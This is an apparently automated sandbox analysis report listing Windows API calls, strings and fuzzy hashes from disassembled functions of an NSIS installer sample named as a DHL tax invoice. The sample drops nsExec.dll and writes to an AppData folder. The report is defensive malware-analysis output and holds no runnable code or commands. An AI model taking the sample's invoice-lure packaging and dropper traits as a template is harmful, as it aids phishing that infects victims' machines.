                                                            [Control-flow graph: function entry block 40541c-405437]
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 0040547A
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405489
                                                            • GetClientRect.USER32(?,?), ref: 004054C6
                                                            • GetSystemMetrics.USER32(00000002), ref: 004054CD
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054EE
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054FF
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405512
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405520
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405533
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405555
                                                            • ShowWindow.USER32(?,00000008), ref: 00405569
                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040558A
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040559A
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055B3
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055BF
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405498
                                                              • Part of subcall function 00404277: SendMessageW.USER32(00000028,?,00000001,004040A3), ref: 00404285
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055DC
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000053B0,00000000), ref: 004055EA
                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055F1
                                                            • ShowWindow.USER32(00000000), ref: 00405615
                                                            • ShowWindow.USER32(?,00000008), ref: 0040561A
                                                            • ShowWindow.USER32(00000008), ref: 00405664
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405698
                                                            • CreatePopupMenu.USER32 ref: 004056A9
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056BD
                                                            • GetWindowRect.USER32(?,?), ref: 004056DD
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056F6
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040572E
                                                            • OpenClipboard.USER32(00000000), ref: 0040573E
                                                            • EmptyClipboard.USER32 ref: 00405744
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405750
                                                            • GlobalLock.KERNEL32(00000000), ref: 0040575A
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040576E
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040578E
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405799
                                                            • CloseClipboard.USER32 ref: 0040579F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                            • String ID: (7B${
                                                            • API String ID: 4154960007-525222780
                                                            • Opcode ID: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                            • Instruction ID: 3349dadf3efb3a8fdffdb79f187be012afacb07b5928e089a4a7fd9dccbac2fd
                                                            • Opcode Fuzzy Hash: eb59534d035534922114e87074bc313431370419dc47d72610ca3581fdfcb614
                                                            • Instruction Fuzzy Hash: 60B15670900608FFDB119FA0DD89EAE3B79FB48354F40847AFA45A61A0CB754E52DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Figure not preserved: control-flow graph whose first block is 4061a0-4061ab; legend: Executed / Not Executed]
                                                            APIs
                                                            • GetVersion.KERNEL32(00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,00405314,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000), ref: 00406263
                                                            • GetSystemDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004062E1
                                                            • GetWindowsDirectoryW.KERNEL32(ExecToStack,00000400), ref: 004062F4
                                                            • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406330
                                                            • SHGetPathFromIDListW.SHELL32(?,ExecToStack), ref: 0040633E
                                                            • CoTaskMemFree.OLE32(?), ref: 00406349
                                                            • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 0040636D
                                                            • lstrlenW.KERNEL32(ExecToStack,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,?,00405314,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000), ref: 004063C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                            • String ID: ExecToStack$Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                            • API String ID: 900638850-2041451948
                                                            • Opcode ID: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                            • Instruction ID: 57c77dc533264c97ace6329bd87f7d674c2bea75a5b3d90d15d675b8bae5a73d
                                                            • Opcode Fuzzy Hash: 978d560dfc87019ac3657ebba0841bd774ce65c1ae89d16051c02eb976f42344
                                                            • Instruction Fuzzy Hash: 1E611571A00104EBDF209F24CC40AAE37A5AF15314F56817FED56BA2D0D73D8AA2CB9D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Figure not preserved: control-flow graph whose first block is 40596f-405995; legend: Executed / Not Executed]
                                                            APIs
                                                            • DeleteFileW.KERNELBASE(?,?,74DF3420,74DF2EE0,00000000), ref: 00405998
                                                            • lstrcatW.KERNEL32(00425730,\*.*), ref: 004059E0
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405A03
                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,74DF3420,74DF2EE0,00000000), ref: 00405A09
                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,74DF3420,74DF2EE0,00000000), ref: 00405A19
                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AB9
                                                            • FindClose.KERNEL32(00000000), ref: 00405AC8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$0WB$\*.*
                                                            • API String ID: 2035342205-1995485284
                                                            • Opcode ID: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                            • Instruction ID: 6c547db7f4d1248ed83a6ec2b2b7cf99957869ea0eb35c9edb1a86952611c1c3
                                                            • Opcode Fuzzy Hash: 650d65efca721ae95f05fec5e6387b525ef9089e97d219b3eee7621c95804d20
                                                            • Instruction Fuzzy Hash: 5A41B530A40914A6CB21AB659CC9AAF7678EF41724F20427FF801711D1D77C5986DE6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                            • Instruction ID: 84f5b91c3f937eb173619b21672ae23043901769df73ed9f159891f0fc81c8d0
                                                            • Opcode Fuzzy Hash: ead38b7015f9474378dd182d16c601773bd961a48b8ca1aefc3332049c463b86
                                                            • Instruction Fuzzy Hash: 72F18671D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7385A8ACF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(74DF3420,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30,74DF3420,?,74DF2EE0,0040598F,?,74DF3420,74DF2EE0), ref: 004064CC
                                                            • FindClose.KERNEL32(00000000), ref: 004064D8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID: xgB
                                                            • API String ID: 2295610775-399326502
                                                            • Opcode ID: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                            • Instruction ID: 909a2899cbbcfc21b24ab628f9350e7a3c7b3772aa6d432f74911df6ac2d0bb5
                                                            • Opcode Fuzzy Hash: 4403a27f78f835125bd15cd158b53f866fd18ebbb8f54cd400289453990cbd04
                                                            • Instruction Fuzzy Hash: 8BD0C9315045209BC2111778AE4C85B7A98AF553317628A36B466F12A0C674CC22869C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            [Figure not preserved: control-flow graph whose first block is 403d6a-403d7c; legend: Executed / Not Executed]
                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403DA6
                                                            • ShowWindow.USER32(?), ref: 00403DC3
                                                            • DestroyWindow.USER32 ref: 00403DD7
                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DF3
                                                            • GetDlgItem.USER32(?,?), ref: 00403E14
                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E28
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403E2F
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403EDD
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403EE7
                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00403F01
                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F52
                                                            • GetDlgItem.USER32(?,00000003), ref: 00403FF8
                                                            • ShowWindow.USER32(00000000,?), ref: 00404019
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040402B
                                                            • EnableWindow.USER32(?,?), ref: 00404046
                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040405C
                                                            • EnableMenuItem.USER32(00000000), ref: 00404063
                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040407B
                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040408E
                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 004040B7
                                                            • SetWindowTextW.USER32(?,00423728), ref: 004040CB
                                                            • ShowWindow.USER32(?,0000000A), ref: 004041FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID: (7B
                                                            • API String ID: 3282139019-3251261122
                                                            • Opcode ID: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                            • Instruction ID: 4530f9416eb169af0d44378ddba5762a1eee688012323a74912104aead4a3b33
                                                            • Opcode Fuzzy Hash: dd9405652fbbb87ab488d8a14d0aeb81f33be68f6094b2cdc8f2b1d388c01c08
                                                            • Instruction Fuzzy Hash: A5C1FFB1640200FFCB206F61EE84E2B3AA8EB95745F40057EF641B21F1CB7999529B6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (function entry 004039C7)
                                                            APIs
                                                              • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                              • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                            • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",00000000), ref: 004039E1
                                                              • Part of subcall function 004060C5: wsprintfW.USER32 ref: 004060D2
                                                            • lstrcatW.KERNEL32(1033,00423728), ref: 00403A48
                                                            • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\releve,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,74DF3420), ref: 00403AC8
                                                            • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\releve,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                            • GetFileAttributesW.KERNEL32(ExecToStack), ref: 00403AE6
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\releve), ref: 00403B2F
                                                            • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                            • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                            • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\releve$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 606308-2161404446
                                                            • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                            • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                            • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                            • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (function entry 00402E41)
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402E55
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,00000400), ref: 00402E71
                                                              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00402EBA
                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 2803837635-872889490
                                                            • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                            • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
                                                            • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                            • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (function entry 00401767)
                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                            • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\releve,?,?,00000031), ref: 004017CD
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll$C:\Users\user\AppData\Local\releve$ExecToStack
                                                            • API String ID: 1941528284-4006103106
                                                            • Opcode ID: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                            • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                            • Opcode Fuzzy Hash: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                            • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (function entry 004052DD)
                                                            APIs
                                                            • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                            • lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                            • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                            • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll
                                                            • API String ID: 2531174081-1556000805
                                                            • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                            • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                            • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                            • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 751 4057ac-4057f7 CreateDirectoryW 752 4057f9-4057fb 751->752 753 4057fd-40580a GetLastError 751->753 754 405824-405826 752->754 753->754 755 40580c-405820 SetFileSecurityW 753->755 755->752 756 405822 GetLastError 755->756 756->754
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                            • GetLastError.KERNEL32 ref: 00405803
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                            • GetLastError.KERNEL32 ref: 00405822
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                            • C:\Users\user\Desktop, xrefs: 004057AC
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                            • API String ID: 3449924974-2028306314
                                                            • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                            • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
                                                            • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                            • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 757 4064e8-406508 GetSystemDirectoryW 758 40650a 757->758 759 40650c-40650e 757->759 758->759 760 406510-406519 759->760 761 40651f-406521 759->761 760->761 762 40651b-40651d 760->762 763 406522-406555 wsprintfW LoadLibraryExW 761->763 762->763
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                            • wsprintfW.USER32 ref: 0040653A
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                            • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
                                                            • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                            • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 764 405d82-405d8e 765 405d8f-405dc3 GetTickCount GetTempFileNameW 764->765 766 405dd2-405dd4 765->766 767 405dc5-405dc7 765->767 769 405dcc-405dcf 766->769 767->765 768 405dc9 767->768 768->769
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405DA0
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                            Strings
                                                            • "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", xrefs: 00405D82
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                            • nsa, xrefs: 00405D8F
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-4227925031
                                                            • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                            • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
                                                            • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                            • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

